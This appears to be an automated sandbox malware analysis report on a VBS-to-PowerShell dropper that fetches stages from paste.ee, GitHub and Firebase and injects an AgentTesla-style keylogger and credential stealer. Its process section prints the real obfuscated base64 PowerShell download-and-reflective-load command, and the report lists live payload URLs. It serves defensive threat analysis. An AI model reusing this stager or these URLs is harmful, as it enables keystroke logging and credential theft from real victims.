                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000B.00000002.1476246463.00007FFAAC5C0000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp

                  Software Vulnerabilities

                  barindex
                  Suspicious execution chain found
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                  Networking

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\wscript.exeNetwork Connect: 188.114.97.3 443Jump to behavior
                  Connects to a pastebin service (likely for C&C)
                  Source: unknownDNS query: name: paste.ee
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.powershell.exe.27d11278980.0.raw.unpack, type: UNPACKEDPE
                  Source: alcatifa.vbs.12.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
                  Source: alcatifa.vbs.12.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
                  Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: unknownDNS query: name: ip-api.com
                  Source: global trafficHTTP traffic detected: GET /d/gvOd3 HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
                  Source: global trafficHTTP traffic detected: GET /d/gvOd3 HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /d/gvOd3 HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
                  Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /d/gvOd3 HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: paste.ee
                  Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                  Source: global trafficDNS traffic detected: DNS query: ip-api.com
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D00520000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://firebasestorage.googleapis.com
                  Source: AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002AD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                  Source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2549002759.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                  Source: AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.comp
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D01ACA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1435738029.0000027D10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: wscript.exe, 00000000.00000003.1517826151.000001D52D429000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1520130545.000001D52D429000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/
                  Source: wscript.exe, 00000000.00000003.1518428835.000001D52F330000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1517658450.000001D52D466000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1521404049.000001D52EE83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1520130545.000001D52D44E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1517797280.000001D52D44D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1517220439.000001D52EE7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1517618403.000001D52D455000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1517765900.000001D52D46C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1521135156.000001D52EE40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1520438484.000001D52D46D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/gvOd3
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D00223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D0170C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
                  Source: powershell.exe, 00000008.00000002.1489002671.000001FFE5CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1413532103.0000027D00001000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D0175D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D00223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2549002759.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                  Source: powershell.exe, 00000008.00000002.1489002671.000001FFE5D01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1489002671.000001FFE5CE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1413532103.0000027D00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                  Source: wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                  Source: wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                  Source: wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                  Source: powershell.exe, 0000000B.00000002.1435738029.0000027D10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 0000000B.00000002.1435738029.0000027D10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 0000000B.00000002.1435738029.0000027D10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D00520000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firebasestorage.googleapis.com
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D00434000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firebasestorage.googleapis.com/v0/b/crypts2024.appspot.com/o/xavierorigin07102024.txt?alt=me
                  Source: wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                  Source: wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D00223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D0122A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D01ACA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1435738029.0000027D10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D0175D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D0175D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                  Source: wscript.exe, 00000000.00000002.1520580547.000001D52D490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1516837297.000001D52D490000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/gvOd3
                  Source: wscript.exe, 00000000.00000002.1520580547.000001D52D490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1516837297.000001D52D490000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/gvOd3ee/dD
                  Source: wscript.exe, 00000000.00000003.1516670838.000001D52D4C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1516964493.000001D52D4C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1520758800.000001D52D4C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/gvOd3t
                  Source: wscript.exe, 00000000.00000002.1520580547.000001D52D490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1516837297.000001D52D490000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/zD
                  Source: wscript.exe, 00000000.00000002.1520580547.000001D52D490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1516837297.000001D52D490000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee:443/d/gvOd3
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D01707000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercont
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D01685000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1413532103.0000027D00223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D00223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D00223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtC7I;
                  Source: wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                  Source: wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                  Source: wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                  Source: wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49700 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.7:49709 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to log keystrokes (.Net Source)
                  Source: 11.2.powershell.exe.27d11278980.0.raw.unpack, oAKy.cs.Net Code: ExGJKp0bbyd

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 11.2.powershell.exe.27d11278980.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.powershell.exe.27d11278980.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 11.2.powershell.exe.27d11278980.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.powershell.exe.27d11278980.0.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 7176, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Server XML HTTP 6.0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88d96a0b-f192-11d4-a65f-0040963251e5}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}Jump to behavior
                  Wscript starts Powershell (via cmd or directly)
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQgAnACsAJwAwADgAdQByAGwAIAA9ACAAQwAnACsAJwA3AEkAaAB0AHQAcABzADoALwAvAHIAYQAnACsAJwB3AC4AJwArACcAZwBpACcAKwAnAHQAaAB1ACcAKwAnAGIAdQAnACsAJwBzAGUAcgBjAG8AbgB0ACcAKwAnAGUAbgB0ACcAKwAnAC4AYwAnACsAJwBvAG0ALwBOACcAKwAnAG8ARABlAHQAZQBjAHQATwAnACsAJwBuAC8ATgBvAEQAZQAnACsAJwB0AGUAYwB0AE8AbgAvAHIAZQBmAHMAJwArACcALwBoACcAKwAnAGUAYQAnACsAJwBkACcAKwAnAHMAJwArACcALwAnACsAJwBtACcAKwAnAGEAaQBuAC8ARABlACcAKwAnAHQAYQBoAE4AbwAnACsAJwB0AGgALQBWACcAKwAnAC4AdAAnACsAJwB4AHQAQwAnACsAJwA3AEkAOwAgAEIAMAAnACsAJwA4AGIAYQBzACcAKwAnAGUANgA0AEMAJwArACcAbwAnACsAJwBuAHQAZQBuAHQAIAA9ACAAKABOAGUAdwAtAE8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwAnACsAJwBhAGQAJwArACcAUwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABCACcAKwAnADAAOAB1ACcAKwAnAHIAbAAnACsAJwApADsAIABCADAAJwArACcAOAAnACsAJwBiAGkAbgBhACcAKwAnAHIAJwArACcAeQAnACsAJwBDACcAKwAnAG8AbgB0ACcAKwAnAGUAbgB0ACAAPQAnACsAJwAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAJwArACcAcgB0AF0AOgA6ACcAKwAnAEYAcgAnACsAJwBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuACcAKwAnAGcAKAAnACsAJwBCADAAJwArACcAOABiAGEAJwArACcAcwBlADYANAAnACsAJwBDAG8AbgB0ACcAKwAnAGUAbgB0ACkAOwAgACcAKwAnAEIAMAA4AGEAcwBzAGUAbQBiAGwAeQAgACcAKwAnAD0AIABbAFIAZQBmAGwAJwArACcAZQBjACcAKwAnAHQAJwArACcAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATAAnACsAJwBvAGEAZAAoAEIAMAA4ACcAKwAnAGIAaQBuAGEAcgB5AEMAJwArACcAbwAnACsAJwBuAHQAZQBuACcAKwAnAHQAKQAnACsAJwA7ACAAWwBkAG4AbABpAGIAJwArACcALgBJACcAKwAnAE8ALgBIACcAKwAnAG8AbQAnACsAJwBlACcAKwAnAF0AOgA6AFYAQQAnACsAJwBJACgAJwArACcAcABRACcAKwAnAFUAOAA4ADQAZQAnACsAJwA4AGUAMABkADUAMgAnACsAJwBmADAALQAnACsAJwBlADUAYQAnACsAJwBiAC0AJwArACcAMQAnACsAJwAxADYANAAtADAAMABjADYAJwArACcALQBhAGEAYQAyAGYAZgA1AGUAJwArACcAPQAnACsAJwBuACcAKwAnAGUAJwArACcAawAnACsAJwBvAHQAJgBhAGkAZABlAG0APQB0AGwAYQA/AHQAeAAnACsAJwB0ACcAKwAnAC4ANAAyADAAMgAwADEANwAwAG4AaQBnACcAKwAnAGkAcgBvAHIAZQAnACsAJwBpAHYAYQB4AC8AbwAvAG0AbwAnACsAJwBjAC4AJwArACcAdABvAHAAcwBwAHAAYQAuADQAMgAwADIAcwAnACsAJwB0AHAAeQByACcAKwAnAGMAJwArACcALwBiAC8AMAB2ACcAKwAnAC8AbQBvAGMAJwArACcALgAnACsAJwBzAGkAcABhAGUAbABnACcAKwAnAG8AbwBnACcAKwAnAC4AZQAnACsAJwBnAGEAcgBvACcAKwAnAHQAJwArACcAcwBlAHMAYQBiACcAKwAnAGUAcgBpAGYAJwArACcALwAvADoAJwArACcAcwAnACsAJwBwAHQAJwArACcAdABoAHAAUQBVACwAJwArACcAIABwAFEAVQAxAHAAUQBVACwAJwArACcAIABwAFEAVQBDADoAVAAnACsAJwA0AHkAUAByAG8AZwByAGEAbQBEAGEAdABhACcAKwAnAFQANAAnACsAJwB5ACcAKwAnAHAAUQBVACwAIABwACcAKwAnAFEAVQBhACcAKwAnAGwAYwBhAHQAaQAnACsAJwBmAGEAcAAnACsAJwBRAFUALAAgAHAAUQBVAEEAZABkAEkAbgBQAHIAJwArACcAbwBjAGUAcwBzADMAJwArACcAMgAnACsAJwBwAFEAVQAsACAAcABRACcAKwAnAFUAcABRAFUALABwACcAKwAnAFEAVQAnACsAJwBwACcAKwAnAFEAVQApACcAKQAgACAALQBDAHIAZQBwAEwAYQBDAGUAIAAoAFsAQwBoAGEAUgBdADEAMQAyACsAWwBDAGgAYQBSAF0AOAAxACsAWwBDAGgAYQBSAF0AOAA1ACkALABbAEMAaABhAFIAXQAzADQAIAAgAC0AQwByAGUAcABMAGEAQwBlACAAIAAoAFsAQwBoAGEAUgBdADYANwArAFsAQwBoAGEAUgBdADUANQArAFsAQwBoAGEAUgBdADcAMwApACwAWwBDAGgAYQBSAF0AMwA5ACAAIAAtAFIAZQBQAG
